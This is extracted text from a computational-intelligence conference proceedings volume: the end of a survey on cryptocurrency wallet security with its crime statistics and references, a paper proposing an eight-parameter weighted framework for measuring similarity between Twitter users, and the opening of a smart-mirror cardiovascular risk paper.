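sigs = [sign(k, tx) for k in keys[:3]]  # sign with 3 of the 5 keys
```

With only two signatures, or with signatures over a different transaction, `threshold_ok` rejects the transaction, which is what lets the remaining keys serve as recoverable backups.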
3 Comparative Analysis
The above literature study reveals that making the private key more secure is the most
effective way to protect the wallet from hackers and attackers. In this section, we
analyse the benefits and shortcomings of some of these approaches to find the best
solution. A comparison of the related research work is given in Table 1.
Various news items and research reports reflect that the loss due to breaches of crypto-systems
is enormous [51–54]. As per these reports, cryptocurrency crimes had
surpassed a figure of US$1.36 billion in the five months until May 2020 alone. It
is predicted to be the second-highest crime year in terms of cryptocurrencies. In the
previous year, 2019, the total crypto losses due to hacks and frauds were recorded to be $4.5
billion, as enunciated in Table 2.
Apart from this, there were two major losses in the first three months of 2019
which resulted in a massive crypto loss [54]. As a specific event, one major loss in
2019 was noted upon the sudden demise of Mr Gerry Cotton, founder and CEO of a
Canadian cryptocurrency exchange platform. As per the reports, it is speculated that
Cotton had printed clients' private keys and used cold wallets to store them. This
incident puts a question mark on the security levels of cold wallets.
A Web-based study from Reuters states that in 2018, out of $1.7 billion in digital-currency
losses, $950 million was due to crypto exchanges and infrastructure
services like wallets [52]. Analysing the records of the five years from 2016 to May
2020 reveals that crypto-crime losses grew almost linearly during 2016–2017;
there was not much increase in crypto crimes, but from 2018 onwards they appear to
increase exponentially. Figure 4 shows the spike in the number of crypto crimes
during the past five years. Solid lines in the chart show complete-year data, and dotted
lines show the data of the current year until May 2020.
4 Conclusion
References
10. Rajput, S., Singh, A., Khurana, S., Bansal, T., & Shreshtha, S. (2019). Blockchain tech-
nology and cryptocurrenices. In 2019 Amity International Conference on Artificial Intelli-
gence (AICAI), Dubai, United Arab Emirates (pp. 909–912). https://doi.org/10.1109/AICAI.
2019.8701371
11. Pal, O., Alam, B., Thakur, V., & Singh, S. (2019). Key management for blockchain technology.
In ICT Express, ISSN 2405-9595. https://doi.org/10.1016/j.icte.2019.08.002
12. Sabah, S., Mahdi, N., & Majeed, I. (2019). The road to the blockchain technology: Concept
and types. Periodicals of Engineering and Natural Sciences (PEN) (Vol. 7, pp. 1821–1832),
Dec 2019. https://doi.org/10.21533/pen.v7i4.935
13. Conti, M., Sandeep Kumar, E., Lal, C., & Ruj, S. (2018). A survey on security and privacy
issues of bitcoin. In IEEE Communications Surveys & Tutorials (Vol. 20, No. 4, pp. 3416–3452),
Fourthquarter 2018. https://doi.org/10.1109/COMST.2018.2842460
14. Li, X., Jiang, P., Chen, T., Luo, X., & Wen, Q. A survey on the security of blockchain systems.
Future Generation Computer Systems, 107, 841–853. ISSN 0167-739X
15. Dasgupta, D., Shrein, J. M., & Gupta, K. D. (2019). A survey of blockchain from security
perspective. Journal of Banking and Financial Technology, 3, 1–17. https://doi.org/10.1007/
s42786-018-00002-6
16. Jokić, S., Cvetković, A. S., Adamović, S., Ristić, N., & Spalević, P. (2019). Comparative
analysis of cryptocurrency wallets vs traditional wallets. Proceedings of International Journal
for Economic Theory and Practice and Social Issues, Oct 2019, https://scindeks-clanci.ceon.
rs/data/pdf/0350-137X/2019/0350-137X1903065J.pdf
17. Latifa, E.-R., Ahemed, E. K. M., Mohamed, E. G., & Omar, A. Blockchain: bitcoin
wallet cryptography security, challenges and countermeasures. Journal of Internet Banking
and Commerce. https://www.icommercecentral.com/open-access/blockchain-bitcoin-wallet-
cryptography-security-challenges-and-countermeasures.php?aid=86561
18. Aydar, M., Cetin, S., Ayvaz, S., & Aygun, B. (2020). Private key encryption and recovery in
blockchain. Submitted on 9 Jul 2019 (v1), last revised 25 Jun 2020 (this version, v2).
19. Sun, S.-F., Au, M. H., Liu, J. K., & Yuen, T. H., (2017). RingCT 2.0: A compact accumulator-
based (linkable ring signature) protocol for blockchain cryptocurrency monero. In Proc. Eur.
Symp. Res. Comput. Secur. (pp. 456–474).
20. https://cointelegraph.com/news/14b-in-crypto-stolen-in-first-five-months-of-2020-says-cip
hertrace. Accessed on Oct. 21, 2020.
21. Rezaeighaleh, H., & Zou, C. C. (2019). New secure approach to backup cryptocurrency wallets.
In 2019 IEEE Global Communications Conference (GLOBECOM), Waikoloa, HI, USA (pp. 1–
6). https://doi.org/10.1109/GLOBECOM38437.2019.9014007
22. https://ledgerops.com/blog/2019-03-28-top-five-blockchain-security-issues-in-2019.
Accessed on Oct. 16, 2020.
23. Kaushal, P. K., Bagga, A., & Sobti, R. (2017). Evolution of bitcoin and security risk in bitcoin
wallets. In 2017 International Conference on Computer, Communications and Electronics
(Comptelix), Jaipur (pp. 172–177). https://doi.org/10.1109/COMPTELIX.2017.8003959
24. Wang, H., Wang, Y., Cao, Z., Li, Z., Xiong, G. (2019). An overview of blockchain security
analysis. In: X. Yun, et al. (eds.). Cyber Security. CNCERT 2018, Communications in Computer
and Information Science (Vol. 970). Springer. https://doi.org/10.1007/978-981-13-6621-5_5
25. https://www.bleepingcomputer.com/news/security/iota-cryptocurrency-users-lose-4-million-
in-clever-phishing-attack/#:~:text=A%20clever%20hacker%20made%20off,steal%20m
oney%20from%20users’%20accounts. Accessed on Oct. 23, 2020.
26. Breitner, J., Heninger, N. (2019). Biased Nonce sense: Lattice attacks against weak ECDSA
signatures in cryptocurrencies. In: I. Goldberg, T. Moore (eds.). Financial cryptography and
data security. FC 2019. Lecture Notes in Computer Science (Vol. 11598). Cham: Springer.
https://doi.org/10.1007/978-3-030-32101-7_1
27. https://www.internetsociety.org/blog/2017/11/roca-encryption-vulnerability. Accessed on Oct.
21, 2020.
28. https://www.zdnet.com/article/upbit-cryptocurrency-exchange-loses-48-5-million-to-hackers.
Accessed on Oct. 21, 2020.
29. Gan, S. (2017). An IoT simulator in NS3 and a key based authentication architecture for IoT
devices using blockchain. Indian Institute of Technology, Kanpur (online). https://security.cse.
iitk.ac.in/node/240. Accessed on Oct. 21, 2020.
30. Salman, T., Zolanvari, M., Erbad, A., Jain, R., & Samaka, M. (2019). Security services using
blockchains: A state-of-the-art survey. In IEEE Communications Surveys & Tutorials (Vol. 21,
No. 1, pp. 858–880), Firstquarter. https://doi.org/10.1109/COMST.2018.2863956
31. Matsumoto, S., Reischuk, R. M. (2017). IKP: turning a PKI around with decentralized auto-
mated incentives. In 2017 IEEE Symposium on Security and Privacy, SP, San Jose, CA
(pp. 410–426).
32. Guardtime. (2017). Internet of Things authentication: A blockchain solution using SRAM phys-
ical unclonable functions (online). https://www.intrinsic-id.com/wpcontent/uploads/2017/05/
gt_KSIPUF-web-1611pdf. Accessed on Oct. 21, 2020.
33. He, S., et al. (2018). A social-network-based cryptocurrency wallet-management scheme. IEEE
Access, 6, 7654–7663. https://doi.org/10.1109/ACCESS.2018.2799385
34. Litke, P., & Stewart, J. (2014). Cryptocurrency-stealing malware landscape (Online). Available
https://www.secureworks.com/research/cryptocurrency-stealing-malware-landscape
35. M. Team. Multibit. Available: https://multibit.org. Accessed on Oct. 21, 2020.
36. Wuille, P. (2020). BIP32: Hierarchical deterministic wallets. Available: https://github.com/gen
jix/bips/blob/master/bip0032.md. Accessed on Oct. 2, 2020.
37. Vasek, M., Bonneau, J., Ryan Castellucci, C. K., & Moore, T. (2016). The Bitcoin brain drain:
A short paper on the use and abuse of Bitcoin brain wallets. In Financial Cryptography and
Data Security (Lecture Notes in Computer Science). New York, NY, USA: Springer.
38. Wang, N., Chen, Y., Yang, Y., Fang, Z. & Sun, Y. (2019). Blockchain private key storage
algorithm based on image information hiding. https://doi.org/10.1007/978-3-030-24268-8_50
39. Biswas, C., Gupta, U. D., & Haque, M. M. (2019). An efficient algorithm for confiden-
tiality, integrity and authentication using hybrid cryptography and steganography. In 2019
International Conference on Electrical, Computer and Communication Engineering (ECCE),
Cox’sBazar, Bangladesh (pp. 1–5). https://doi.org/10.1109/ECACE.2019.8679136
40. Rashmi, N., & Jyothi, K. (2018). An improved method for reversible data hiding steganography
combined with cryptography (pp. 81–84). https://doi.org/10.1109/ICISC.2018.8398946
41. Kumar, R., & Singh, N. (2020). A survey based on enhanced the security of image using the
combined techniques of steganography and cryptography (March 29, 2020). In Proceedings of
the International Conference on Innovative Computing & Communications (ICICC), Available
at SSRN: https://ssrn.com/abstract=3563571
42. Chauhan, S., Jyotsna, Kumar, J., & Doegar, A. (2017). Multiple layer text security using vari-
able block size cryptography and image steganography. In 2017 3rd International Conference
on Computational Intelligence & Communication Technology (CICT), Ghaziabad (pp. 1–7).
https://doi.org/10.1109/CIACT.2017.7977303
43. Hosam, O. (2018). Hiding bitcoins in steganographic fractals (pp. 512–519). https://doi.org/
10.1109/ISSPIT.2018.8642736
44. Boiangiu, C.-A., & Morosan, A., & Stan, M. (2015). Fractal objects in computer graphics.
45. Ma, H., & Sun, G. (2020). Blockchain-based group key management scheme in IoT. In D.
S. Huang, V. Bevilacqua, A. Hussain (eds.). Intelligent Computing Theories and Application.
ICIC 2020. Lecture Notes in Computer Science (Vol. 12463). Cham: Springer. https://doi.org/
10.1007/978-3-030-60799-9_39
46. Tian, Y., Wang, Z., Xiong, J., & Ma, J. (2020). A blockchain-based secure key management
scheme with trustworthiness in DWSNs. IEEE Transactions on Industrial Informatics, 16(9),
6193–6202. https://doi.org/10.1109/TII.2020.2965975
47. Zhu, F., et al. (2017). Trust your wallet: A new online wallet architecture for Bitcoin. In
2017 International Conference on Progress in Informatics and Computing (PIC), Nanjing
(pp. 307–311). https://doi.org/10.1109/PIC.2017.8359562
48. Engelmann, C., Scott, S. L., Leangsuksun, C., & He, X. (2008). Symmetric active/active high
availability for high-performance computing system services: Accomplishments and limita-
tions. In 2008 Eighth IEEE International Symposium on Cluster Computing and the Grid
(CCGRID) (pp. 813–818).
49. Tschorsch, F., & Scheuermann, B. (2016). Bitcoin and beyond: A technical survey on decen-
tralized digital currencies. IEEE Communications Surveys & Tutorials, 18(3), 2084–2123.
50. Alqahtani, H., Kavakli-Thorne, M., & Kumar, G. (2019). Applications of Generative Adver-
sarial Networks (GANs): An updated Review. Arch Computat Methods Eng. https://doi.org/
10.1007/s11831-019-09388-y
51. https://ciphertrace.com/spring-2020-cryptocurrency-anti-money-laundering-report. Accessed
on Oct. 21, 2020.
52. https://in.reuters.com/article/us-crypto-currency-crime/cryptocurrency-thefts-scams-hit-1-7-
billion-in-2018-report-idINKCN1PN1SQ. Accessed on Oct. 17, 2020.
53. https://www.cnbc.com/2019/01/29/crime-still-plague-cryptocurrencies-as-1point7-billion-
was-stolen-last-year-.html. Accessed on Oct. 19.
A Contextual Framework to Find
Similarity Between Users on Twitter
Abstract Twitter is one of the most used social networking sites, and people usually
prefer to share on Twitter about themselves, their views, and other things they have an
interest in. The proposed method can be used by the average Twitter user
to find out their degree of similarity to any other user on the platform. The
presented framework finds the similarity between any two users on Twitter based on
eight parameters: mention similarity, common interest, topic and list
similarity, followers-and-following relationship similarity, retweets, likes, common
hashtags, and profile similarity. Every parameter generates a score, and the score
of each parameter does not depend on any other parameter's score. A weight has been
assigned to each parameter according to the score it gets individually, and
the value of each weight lies between 0 and 1. Each parameter requires user data,
such as followers, retweets, likes, and hashtags, that have been extracted using
Twitter's own API. For each Twitter user, data for the eight parameters were collected
from October 2019 to October 2020. The framework can be used for suggesting how similar two
users on Twitter are. It has been verified using datasets of five users,
and from these datasets the percentage similarity is calculated. To determine the
effectiveness of the framework, the result of our case study was compared against a
survey of human judges consisting of 524 people and was found to be moderately
effective.
S. Dahiya
CSE Department, Delhi Technological University, Delhi 110042, India
G. Kumar (B) · A. Yadav
SE Department, Delhi Technological University, Delhi 110042, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 793
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_64
1 Introduction
2 Related Work
The active research pertaining to Twitter revolves around clustering users with similar
interests. This can be utilized in various fields, such as finding online communities,
finding people with similar interests, and personalizing and curating advertisements
for users. In the following section, the major related work of the last decade is discussed:
Goal et al. [1] formed a method of finding similar Twitter users using various
parameters such as the social-graph structure, the popularity of a user, user-interaction data,
and content analysis. The created framework is scalable to users with large active
followings and users with a small number of followers alike. Due to this scalability,
the framework can find similar users for a very large number of users. A machine-learning-based
framework was proposed, built on Hadoop. A dataset of
candidates was constructed using a graph-based cosine-similarity algorithm,
and the candidates were then ranked on the parameters using a logistic-regression
model trained on Twitter data from previous years. In this paper, the methodology
only works between two users and is not yet scalable to large datasets.
Razis et al. [2] formed a method for finding similarity between users on the basis
of their content. The metrics used were based on a combination of four parameters:
URLs, mentions, hashtags, and the URL domains mentioned in the
user's tweets. For calculating their final metric, they used the scores they got from
the similarity metric. The two important factors used were "followers to follower"
and "tweet creation rate." The major areas this paper deals with are rating how much
influence a particular user account has, introducing an ontology for classifying Twitter
entities, and describing a framework that finds similar accounts and their relation
to other such accounts on Twitter. Some related parameters, in addition to a few
new ones, were used in this paper to compute similarity.
Vathi et al. [3] described a methodology to find similar communities that works
on a few similarity metrics based on the interactions users have on Twitter, such as
the following relationship and shared content. For all the hashtags, a vector-space
model of TF-IDF weights is used. After combining all these similarities linearly,
they generate the total similarity score. Along with similarity scores, each parameter
is assigned a weight. The weights are multiplied by the scores, and the summation of
these scores gives the total similarity score.
Kamath et al. [4] propose a method of computing account similarity on RealGraph
using cosine similarity. Diverse interaction data are taken in by RealGraph, which
then tries to predict possible user interactions in the time to come. The prediction
scores calculated by RealGraph are interpreted as the strength of the connection,
which allows a wide range of applications to use RealGraph. Who To Follow (WTF)
is an application of RealGraph used by Twitter to suggest similar users
based on common interests and connections among users.
Ghenawat et al. [5] use a variety of signals to compute a similarity score and
then use MapReduce to process these signals. MapReduce takes a group of input
key/value pairs and uses them to build a group of output key/value pairs. The MapReduce
library expresses the computation as two separate functions: Map and Reduce.
The user writes Map, which takes an input pair and produces a group of intermediate
key/value pairs. This gives their formula high scalability. They let the users decide
the weight assigned to each signal, as they believe similarity is subjective. In this
paper, the weights assigned to the parameters are not decided by the user; instead, they
are based on the score value of each parameter.
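The Map/Reduce shape described above can be sketched for similarity signals. The record layout is a hypothetical illustration, and the shuffle is performed in-process rather than by a distributed runtime:

```python
from collections import defaultdict

def map_phase(record):
    """Map: emit one ((user, other), value) pair per raw interaction record."""
    user, other, signal, value = record
    yield (user, other), value

def reduce_phase(key, values):
    """Reduce: combine all signal values for a user pair into one score."""
    return key, sum(values)

records = [
    ("a", "b", "retweet", 1.0),
    ("a", "b", "like", 0.5),
    ("a", "c", "mention", 2.0),
]

# Shuffle: group intermediate pairs by key, as the MapReduce runtime would.
groups = defaultdict(list)
for record in records:
    for key, value in map_phase(record):
        groups[key].append(value)

scores = dict(reduce_phase(k, v) for k, v in groups.items())
# scores == {("a", "b"): 1.5, ("a", "c"): 2.0}
```

Because Map and Reduce touch only one record or one key at a time, the same two functions scale from this toy loop to a cluster-sized dataset.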
3 Proposed Framework
After examining users' following, followers, tweets, retweets, interests, and some
other parameters, a framework has been devised to quantify the similarity between
users. This section describes all the parameter formulas for computing the similarity
between two users: the first being the input user and the other known as the test user.
Every parameter has its respective formula to calculate the parameter score.
For every parameter score, a weight between 0 and 1 is assigned, according
to the scores that the input user and test user get using the formula. The
weights are then multiplied by their respective scores, and the summation gives us
the total similarity score. Using this score, we then find the percentage similarity of
the input user to the test user. Table 1 shows all the parameters being used
to find similarity, with their definitions. The following section describes the proposed
framework in further detail.
For every parameter, a weight is assigned, as each parameter does not have equal
importance in calculating the similarity score; for example, as likes are the most
common activity, their weight is comparatively low because a like is not a very good
indicator of similarity. The weight is assigned to each parameter based on the
parameter-similarity scores it gets. The weights do not depend on anything else; they
depend only on the score that the parameter gets.
The value of a weight lies between zero and one; the reason for keeping weights
in this range is so that no single weight affects the final score
too strongly. A weight of one means the parameter has the most weightage compared
to all the parameters, and a weight of zero means it has very little weightage.
Weights change according to the scores, as they are updated whenever the data get
updated.
Table 1 Formula used for each parameter similarity computation

Following and follower relationship similarity:
Sim_relationship(Ai, Aj) = 1 if the test user appears in one list, 2 if in two lists, …, p + q if in all lists (2)
p is the number of Ai's followers, and q is the number of Ai's following.

Mention similarity:
Sim_mention(Ai, Aj) = Σ_{l=1}^{w} [TwtsThrd(Ai, Aj) / ThrdTot(Ai, Aj)] × [1 / accntsTot(l, Ai)] (3)
TwtsThrd: function that returns the total count of tweets in a thread in which Ai has mentioned Aj. ThrdTot: total count of tweets in the given thread. accntsTot: total count of users in the selected thread. w is the total number of threads taken into consideration.

Retweet similarity:
Sim_Retwt(Ai, Aj) = NoTwtsInRetwtList(Ai, Aj) (4)
The number of tweets of Aj that Ai retweeted.

Like similarity:
Sim_Like(Ai, Aj) = NoTwtsInLikeList(Ai, Aj) (5)
The number of tweets of Aj that Ai liked.

Common hashtags used:
Sim_Hashtag(Ai, Aj) = Σ_{l=1}^{w} 1 / (1 + Hashset(Ai, Aj, Hl)) (6)
Hashset(Ai, Aj, H) = |NUT(Ai, H) − NUT(Aj, H)| + |N(Ai, H) − N(Aj, H)| + |P(Ai, H) − P(Aj, H)|
P gives the count of positive tweets a user has on the hashtag, N the count of negative tweets, and NUT the count of neutral tweets on the common hashtags. w gives the count of hashtags that Ai and Aj have both used in their tweets.

Common interest:
Sim_Interest(Ai, Aj) = count(ints(Ai) ∩ ints(Aj)) (7)
ints analyses a user and gives their top five interests.

Profile similarity:
Sim_Profile = [gender(Ai) equals gender(Aj)] + [language(Ai) equals language(Aj)] + [location(Ai) equals location(Aj)] (8)
gender, language, and location give the gender, language, and location of a user.

Topic and list similarity:
Sim_Topic(Ai, Aj) = numOfTopicandList(Ai, Aj) (9)
The number of common topics and lists followed by both Ai and Aj.
As all parameter similarity scores vary over different ranges, they have been rescaled
to a common normalization range, thus bringing all the values of the numeric
columns in the dataset to a common scale. This makes the scores more consistent, so
that the effect of each score is about the same and the result depends mainly on
the weights of the parameters. This technique is used to reduce data redundancy
and eliminate undesirable characteristics. The formula used for normalization
is as follows:
y = ((x − min(k)) × (max(j) − min(j))) / (max(k) − min(k)) + min(j) (1)
where
x is the value that is to be normalized,
min(k) is the smallest value in the dataset,
max(k) is the largest value in the dataset,
min(j) is the normalization range's minimum value, and
max(j) is the normalization range's maximum value.
In this framework, x is the score obtained after applying each parameter formula
individually, min(k) is the smallest value of the individual parameter's data, max(k)
is the largest value for each parameter, max(j) is 10, and min(j) is 0.
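Equation (1) with min(j) = 0 and max(j) = 10 can be applied per parameter as follows; the raw scores are hypothetical:

```python
def rescale(x, k_min, k_max, j_min=0.0, j_max=10.0):
    """Min-max rescaling of a raw parameter score into [j_min, j_max] (Eq. 1)."""
    return (x - k_min) * (j_max - j_min) / (k_max - k_min) + j_min

raw_likes = [3, 7, 12, 30]  # hypothetical raw like-similarity scores
lo, hi = min(raw_likes), max(raw_likes)
scaled = [rescale(x, lo, hi) for x in raw_likes]
# The smallest score maps to 0 and the largest to 10.
```

After this step every parameter contributes on the same 0–10 scale, so the final ranking is driven by the weights rather than by differences in raw magnitude.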
SimTotal(Ai, Aj) = Σ_{m=1}^{8} Sim_m(Ai, Aj) × weight_m
Input user (Ai): the user whose similarity has to be found.
Test user (Aj): the user to whom the similarity is being found.
Sim_m: the score produced by the m-th parameter for users Ai and Aj.
This part shows in detail all the parameters that are used to find the similarity between
two users.
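The weighted summation over the eight parameter scores can be sketched as follows; the score and weight values are hypothetical:

```python
def total_similarity(scores, weights):
    """Weighted sum over the eight normalized parameter scores."""
    assert len(scores) == len(weights) == 8
    return sum(s * w for s, w in zip(scores, weights))

# Hypothetical normalized scores (0-10) and weights (0-1) for one user pair.
scores = [4.0, 2.5, 6.0, 1.0, 3.0, 5.0, 7.0, 2.0]
weights = [0.9, 0.6, 0.7, 0.2, 0.5, 0.8, 0.4, 0.3]

sim = total_similarity(scores, weights)      # ≈ 18.4
# Percentage similarity relative to the maximum attainable weighted score.
pct = 100 * sim / (10 * sum(weights))
```

Dividing by the maximum attainable weighted score (all parameters at 10) turns the total into the percentage similarity the framework reports.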
Parameter 1: Followers and Following Relationship
The first parameter used for determining the similarity score is the follower-and-following
relationship. The number of common accounts that both the input user and the test
user follow is directly related to how similar their interests and views probably are.
To compute this parameter, first make a list of the followers of each account in the
input user's following list, and another list of the accounts followed by each account
in the input user's followers list.
Once these lists are made, check the number of times the test user's account
shows up in them. Every time the account shows up, it adds one point to the
parameter score. If the input user has p followers and q following accounts, the
total number of lists is p + q; thus, if the test user appears in every list, the maximum
score is p + q.
For example, in our case-study dataset, the input user, @TomSegura, has 1400 followers
and 140 following profiles. This means a total of 1540 lists exist in which the
test user's name has to be checked.
Parameter 2: Mentions
Similarity from mentions is one of the parameters considered in the proposed formula. If a user mentions another in their tweets, the chances of a strong similarity relationship are high. However, if multiple accounts are mentioned in the same tweet, this decreases the chance of them being strongly related. Thus, using the formulas shown in Table 1, the mention similarity score is calculated from the number of times an account is mentioned and the number of accounts mentioned alongside it. For example, if Tom mentions an account in one of his tweets, the number of times he mentions that account in that thread is divided by the number of accounts mentioned in that particular thread to get the score for the parameter.
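The per-thread division described above can be sketched as below (an assumption-laden simplification: each thread is represented just by its list of mentioned handles):

```python
# Parameter 2 sketch: for each thread, the number of times the account is
# mentioned is divided by the number of distinct accounts mentioned in
# that thread, so crowded threads contribute less to the score.
def mention_score(threads, account):
    score = 0.0
    for mentions in threads:        # list of mentioned handles per thread
        if account in mentions:
            score += mentions.count(account) / len(set(mentions))
    return score
```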
Parameter 3: Retweet Similarity
Retweet similarity is the next parameter in the similarity score calculation. A person
retweets someone’s tweet only if the content of that tweet resonates with them at
some level. This increases the chance that the two are similar. Hence, every tweet of the test user that is retweeted by the input user adds one point to the parameter
score. Retweets were extracted using the Twitter API, and the number of times a
particular account’s tweets have been retweeted is the score of the parameter.
Parameter 4: Like Similarity
Like similarity is one of the parameters in the formula. If a user likes another user's tweet, they usually like the subject matter of that tweet; from this it can be said that the two users have something in common and might hold similar views. The similarity score of this parameter is calculated using the formula, and a point is added for every tweet of the test user liked by the input user. As liking posts on Twitter is a very common activity, a rather small weight is assigned to this parameter to give it less importance. Likes were extracted using the Twitter API, and the number of times a particular account's tweets have been liked is the score of the parameter.
Parameter 5: Common Hashtags
800 S. Dahiya et al.
In this parameter, tweets from both accounts are compared, and the ones with common hashtags are extracted. Sentiment analysis is then performed on the text of each such tweet using Stanford CoreNLP, generating a negative, neutral, or positive label, since the two users' viewpoints on the same hashtag may differ. The final score of the parameter is then calculated using the formula in the table.
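Since the paper's exact scoring formula lives in its table, the comparison can only be illustrated schematically; in this sketch a point is added whenever two tweets share a hashtag and agree in sentiment, with `sentiment` standing in for the Stanford CoreNLP classifier:

```python
# Parameter 5 sketch: pair tweets from the two users that share a hashtag
# and add a point when their sentiment labels agree. `sentiment` is a
# caller-supplied function text -> label (CoreNLP in the paper).
def hashtag_score(tweets_a, tweets_b, sentiment):
    score = 0
    for text_a, tags_a in tweets_a:       # (text, set of hashtags) pairs
        for text_b, tags_b in tweets_b:
            if tags_a & tags_b and sentiment(text_a) == sentiment(text_b):
                score += 1
    return score
```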
Parameter 6: Common Interests
Common interests is one of the parameters used to determine the similarity score. The text of each user's tweets is extracted, and the most used words are found. These words are then checked against a dictionary containing words related to topics and subtopics such as politics, entertainment, literature, area, and cooking, and each person's top five interests are obtained. The top five interests of both accounts are then compared, and each matching interest accounts for one point; this gives the score for the common interest parameter.
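The top-five-interest matching can be sketched as below; the word-to-topic dictionary here is a hypothetical stand-in for the themed word lists the paper relies on:

```python
from collections import Counter

# Parameter 6 sketch: map each user's most used words to topics via a
# word -> topic dictionary, keep the five most frequent topics, and
# count the overlap between the two users' top-five sets.
def top_interests(words, topic_of, k=5):
    counts = Counter(topic_of[w] for w in words if w in topic_of)
    return {topic for topic, _ in counts.most_common(k)}

def interest_score(words_a, words_b, topic_of):
    return len(top_interests(words_a, topic_of) & top_interests(words_b, topic_of))
```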
Parameter 7: Profile Similarity
Profile similarity is one of the parameters used to determine the final similarity score. It consists of three factors: location, gender, and language. As the profile's gender information is not obtainable through Twitter, gender was inferred from the person's name, and the language information was derived from the language usually used in the tweets. Each matching factor contributes one point to the parameter score.
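The three-factor match can be sketched as follows (field names are ours; gender and language are assumed to have been inferred upstream as described):

```python
# Parameter 7 sketch: one point per matching factor among location,
# gender, and language.
def profile_score(profile_a, profile_b):
    return sum(profile_a[f] == profile_b[f] for f in ("location", "gender", "language"))
```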
Parameter 8: Topic and List Similarity
Topic similarity is the parameter counting the number of topics followed by both the input user and the test user. A higher number of topics followed by both users indicates a higher similarity in the content they consume on a regular basis. Each topic common to both lists contributes one point to the score. The same is done for the lists followed by both users. The final score is then the sum of the number of common topics and common lists.
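The summation over common topics and common lists can be sketched as:

```python
# Parameter 8 sketch: one point per topic followed by both users,
# plus one per list followed by both.
def topic_list_score(topics_a, topics_b, lists_a, lists_b):
    return len(set(topics_a) & set(topics_b)) + len(set(lists_a) & set(lists_b))
```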
For simulation of the proposed framework, the code was written in Python 3.9.0 in Jupyter Notebook 5.7.4 with the following hardware specification: GPU: Intel Iris Plus Graphics 645 (1536 MB); processor: Quad-Core Intel Core i5, 1.4 GHz; number of processors: 1; total number of cores: 4.
As mentioned earlier, eight parameters are used to find the similarity between users. Every parameter generates a score, but before a score can be computed, the data need to be extracted. For each user, data for the eight parameters were extracted using Twitter's API; the extracted data span October 2019 to October 2020. These are some of the APIs used:
1. Followers API
2. Liked tweet API
3. Retweet API.
The Twitter API enables programmatic access to Twitter in advanced and unique ways. It is used to analyze, learn from, and interact with tweets.
Measuring similarity among users of social media is a demanding task, as their similarity must be judged from the content they have posted or shared on their social media site; the users therefore need to be reasonably active. Nevertheless, the method should work for any average user on Twitter, as it depends only on their own data.
To demonstrate this, a varied set of accounts has been selected from the fields of entertainment and politics to create a diverse group for our dataset. Each input user
has been compared to the three test users individually, and their percentage similarity
is computed using the parameter scores and the weights assigned to each parameter.
The results of this case study were then compared to a survey of human judges who
decided the similarity of the accounts by arranging them in a descending order of
similarity. We compared this to a similar list made using the percentage similarities
calculated using our proposed methodology, the results of which were found to be
promising.
For analyzing whether the method is correct, it has been applied to 2 input users and 3 test users. The 2 input users are:
@TomSegura—Tom Segura Jr. is a stand-up comedian, writer, and podcaster.
- https://en.wikipedia.org/wiki/Tom_Segura
@JoeBiden—Joe Biden is an American politician serving as the 46th and current president of the USA.
- https://en.wikipedia.org/wiki/Joe_Biden
And the 3 test users are:
@BertKreischer—Bert Kreischer is a stand-up comedian and reality television host.
- https://en.wikipedia.org/wiki/Bert_Kreischer
@Seanseaevans—Sean Evans is an American producer and YouTuber who is best recognized for the series Hot Ones.
- https://en.wikipedia.org/wiki/Sean_Evans
This paper presents a system to calculate the percentage similarity of two users on Twitter. The system takes the profile IDs of the users and finds their similarity. If two users are 25–45 percent similar, they are quite similar in their content. In our case study, Tom and Bert are from the same industry and work together on certain projects, so they should be similar to each other; this is verified by the result that they are 33.5% similar. For the second input user, @JoeBiden, it is apparent that he would have a high similarity percentage to @KamalaHarris's account, as they work closely and talk about very similar subjects on Twitter.
Using this method, the conclusion reached is that @JoeBiden's account is 44.44% similar to @KamalaHarris's account. On the other hand, on comparing with @BertKreischer's account, a value of 8.02% is justified, as they are from completely different professions and engage in very different topics of conversation on Twitter. Similarly, @TomSegura and @KamalaHarris are not from the same industry either, so their similarity score of 11.40% is also justified. Hence, it is evident that this method is effective for finding similarities between Twitter users.
The parameters have been designed so that they can easily be used on other similar social media Web sites. For example, Twitter accounts can be replaced by Instagram, Facebook, or Snapchat accounts, and tweets can be substituted with profile bios. In our methodology, “likes” and “shares” from Facebook can be considered the same as “favorites” and “retweets,” while concepts such as mentions, hashtags, and replies have almost identical counterparts on these Web sites. Hence, with a few tweaks, this methodology can be used to calculate the percentage similarity of users on various other social media platforms.
Five hundred and twenty-four volunteers were asked to rank the test users, @BertKreischer, @Seanseaevans, and @KamalaHarris, in decreasing similarity to @TomSegura and @JoeBiden. The results of the survey were compared with a list made using the percentage similarity calculated by the proposed methodology. According to the survey results, 92.75% and 87.64% of the volunteers produced rankings identical to ours. From this, it can be inferred that the method works for the majority of users on Twitter and produces a fairly accurate result in our case study consisting of a selection of varied accounts.
This paper proposes a methodology to find the percentage similarity between two Twitter users. The similarity percentage is calculated using eight parameters: the follower and following relationship, mentions, retweets, liked tweets, common hashtags, common interests, profile similarity, and topic and list similarity. Further work can be done on assigning weights and adding more parameters to improve this technique.
For comparing its performance, a dataset of 5 users was used, with users from the fields of entertainment and politics. On comparing with the survey results, this method was found to be more efficient and effective than previous works.
Therefore, this is a highly favorable technique for various real-world applications
such as curating advertisements for users based on interests, recommending content
similar to what is normally consumed by the user, and similar account suggestions.
On the Design of a Smart Mirror for
Cardiovascular Risk Prediction
Gianluca Zaza
1 Introduction
Cardiovascular diseases (CVDs) are one of the main causes of death in the world.
Indeed, the World Health Organization (WHO)1 estimated that in 2016 almost 18 million deaths were caused by cardiovascular problems. Specifically, the term
1 https://www.who.int/news-room/fact-sheets/detail/cardiovascular-diseases-(cvds).
G. Zaza (B)
Department of Computer Science, University of Bari, Bari, Italy
e-mail: gianluca.zaza@uniba.it
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 807
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_65
